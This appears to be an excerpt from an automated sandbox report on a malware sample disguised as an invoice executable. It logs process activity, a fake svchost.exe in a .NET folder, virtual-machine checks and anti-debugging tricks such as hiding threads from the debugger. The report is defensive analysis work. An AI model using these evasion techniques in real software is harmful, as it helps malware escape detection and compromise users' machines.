        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4778
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1763
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4493
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2472
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1502
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 8058
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 589
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -16602069666338586s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6448Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
        Source: WerFault.exe, 00000011.00000002.837375808.0000000004528000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
